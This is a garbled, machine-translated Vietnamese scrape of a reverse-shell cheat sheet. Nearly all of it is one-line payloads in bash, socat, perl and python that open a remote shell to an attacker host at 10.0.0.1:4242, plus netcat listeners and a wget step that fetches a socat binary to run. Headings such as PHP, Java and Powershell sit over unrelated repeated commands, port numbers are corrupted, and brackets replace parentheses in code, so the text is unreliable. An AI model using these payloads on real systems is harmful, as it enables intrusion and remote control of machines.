Bảng cheat Shell Reverse
Bản tóm tắt
Công cụ
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0&1
Bash UDP
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 4242
C
Socat
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242
Telnet
Perl
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'
Python
Ruby
IPv4
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'
Socat
python -c 'import socket,subprocess,os;s=socket.socket[socket.AF_INET,socket.SOCK_STREAM];s.connect[["10.0.0.1",4242]];os.dup2[s.fileno[],0];os.dup2[s.fileno[],1];os.dup2[s.fileno[],2];subprocess.call[["/bin/sh","-i"]]'
python -c 'import socket,subprocess;s=socket.socket[socket.AF_INET,socket.SOCK_STREAM];s.connect[["10.0.0.1",4242]];subprocess.call[["/bin/sh","-i"],stdin=s.fileno[],stdout=s.fileno[],stderr=s.fileno[]]'
Telnet
python -c 'socket=__import__["socket"];os=__import__["os"];pty=__import__["pty"];s=socket.socket[socket.AF_INET,socket.SOCK_STREAM];s.connect[["10.0.0.1",4242]];os.dup2[s.fileno[],0];os.dup2[s.fileno[],1];os.dup2[s.fileno[],2];pty.spawn["/bin/sh"]'
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42420
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42421
Chiến tranh
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42422
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42423
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42424
Vỏ máy đo
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42425
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42426
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42427
IPv6
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42428
Windows đã tổ chức TCP ngược
Victim: sh -i >& /dev/udp/10.0.0.1/4242 0>&1 Listener: nc -u -lvp 42429
Windows TCP đảo ngược không nạm
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42420
Linux đã tổ chức TCP ngược
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42421
Linux lảo đảo ngược TCP
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42422
PHP
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42423
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42424
Ruby
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42425
Golang
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42426
Netcat truyền thống
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42427
Netcat OpenBSD
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42428
Netcat BusyBox
user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242 user@victim$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42429
Ncat
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42420
OpenSSL
Attacker:
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42421
Perl
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42422
Powershell
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42423
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42424
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42425
Awk
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42426
Java
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42427
Java thay thế 1
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42428
Java thay thế 2
Java: This is more stealthy
user@victim$ wget -q //github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.1:42429
Telnet
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'0
Chiến tranh
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'1
Lua
Ruby
Socat
Telnet
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'3
Nodejs
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'4
Groovy
Java thay thế 1
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'5
Groovy thay thế 1
Java: This is more stealthy
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'6
C
Lua
Ncat
Phi tiêu
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'8
Vỏ máy đo
Windows đã tổ chức TCP ngược
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'9
Windows TCP đảo ngược không nạm
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'0
Linux đã tổ chức TCP ngược
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'1
Linux lảo đảo ngược TCP
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'2
Các nền tảng khác
SPAWN TTY SHELL
SPAWN TTY SHELL
Người giới thiệu
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'4
Máy phát điện cắt ngược-Trình tạo vỏ ngược được lưu trữ [Nguồn]
Revshellgen - CLI Reverse Shell Trình tạo
Đừng quên kiểm tra với người khác Shell: SH, Ash, BSH, CSH, KSH, ZSH, PDKSH, TCSH, BASH
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'5
Có thể tìm thấy nhị phân SOCAT tĩnh tại //github.com/andrew-d/static-binaries
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'6
Chỉ Linux
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'7
-
python -c 'import socket,os,pty;s=socket.socket[socket.AF_INET,socket.SOCK_STREAM];s.connect[["10.0.0.1",4242]];os.dup2[s.fileno[],0];os.dup2[s.fileno[],1];os.dup2[s.fileno[],2];pty.spawn["/bin/sh"]'
- IPv4 [không có khoảng trống]
- IPv4 [không có khoảng trống, rút ngắn]
- IPv4 [không có khoảng trống, rút ngắn thêm]
IPv6 [không có khoảng trống]
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'8
IPv6 [không có khoảng trống, rút ngắn]
Chỉ Windows [Python2]
Chỉ Windows [Python3]
TLS-PSK [không dựa vào PKI hoặc chứng chỉ tự ký]
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import socket,os,pty;s=socket.socket[];s.connect[[os.getenv["RHOST"],int[os.getenv["RPORT"]]]];[os.dup2[s.fileno[],fd] for fd in [0,1,2]];pty.spawn["/bin/sh"]'9
Lưu ý: điều này là lén lút hơn
python -c 'import socket,os,pty;s=socket.socket[socket.AF_INET,socket.SOCK_STREAM];s.connect[["10.0.0.1",4242]];os.dup2[s.fileno[],0];os.dup2[s.fileno[],1];os.dup2[s.fileno[],2];pty.spawn["/bin/sh"]'0
perl -e 'use Socket;$i="10.0.0.1";$p=4242;socket[S,PF_INET,SOCK_STREAM,getprotobyname["tcp"]];if[connect[S,sockaddr_in[$p,inet_aton[$i]]]]{open[STDIN,">&S"];open[STDOUT,">&S"];open[STDERR,">&S"];exec["/bin/sh -i"];};' perl -MIO -e '$p=fork;exit,if[$p];$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;' NOTE: Windows only perl -MIO -e '$c=new IO::Socket::INET[PeerAddr,"10.0.0.1:4242"];STDIN->fdopen[$c,r];$~->fdopen[$c,w];system$_ while;'2
Người giới thiệu
- Máy phát điện cắt ngược-Trình tạo vỏ ngược được lưu trữ [Nguồn]
- Revshellgen - CLI Reverse Shell Trình tạo
- Đừng quên kiểm tra với người khác Shell: SH, Ash, BSH, CSH, KSH, ZSH, PDKSH, TCSH, BASH
- Có thể tìm thấy nhị phân SOCAT tĩnh tại //github.com/andrew-d/static-binaries